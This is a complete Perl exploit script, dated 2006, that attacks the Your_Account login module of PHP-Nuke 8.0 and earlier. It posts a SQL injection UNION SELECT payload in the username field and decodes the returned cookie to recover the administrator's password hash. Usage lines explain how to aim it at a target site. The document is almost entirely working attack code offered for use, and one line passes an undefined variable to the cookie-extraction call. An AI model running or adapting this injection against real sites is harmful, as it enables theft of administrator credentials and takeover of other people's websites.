#!/usr/bin/perl

# phpnuke <= 8.0, module: Your_Account
# This exploit allows to get admin's password
# need for work:
# magic_quotes off
# ------------------------------------------------
# coded by Kermil
# 24.10.2006


use LWP::UserAgent;
use HTTP::Cookies;
use MIME::Base64;

if ( @ARGV < 3 )
{
   usage();
}


$path = $ARGV[0];
$username = $ARGV[1];
$prefix = $ARGV[2];

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
$xpl->default_header('Referer' => $path );

$res = $xpl->post( $path.'modules.php?name=Your_Account&op=login',
     Content => [
                 "user_password" => "abc",
                 "username" => "karamba'/**/UNION SELECT '900150983cd24fb0d6963f7d28e17f72',2,1,1,1,1,1,1,pwd,1 FROM ".$prefix."_authors WHERE aid='$username'/*",

                 ]);

print $res->content;

$cookie_jar->extract_cookies( $response );
$cookie = $cookie_jar->as_string();

$cookie =~ m/user=([^;]+)/;
$cookie = $1;
$decoded = decode_base64( $cookie );

@list = split( ':', $decoded );

$hash = "";

$hash = $list[9];

if ( $hash eq "" )
{
 print "Exploit failed...";
}
else
{
   print "Hash: ".$hash;
}

sub usage()
{
   print " Usage: phpnukeGetAdminPassword.pl <path> <admin's name> <prefix>\r\n";
   print " <path> - Path to phpnuke, e.g. http://phpnuke.com/\r\n";
   print " <admin's name>  - name of administrator, e.g. admin\r\n";
   print " <prefix> - prefix of tables in database, e.g. nuke\r\n";
   print "Coded by Kermil\r\n";
   exit();
}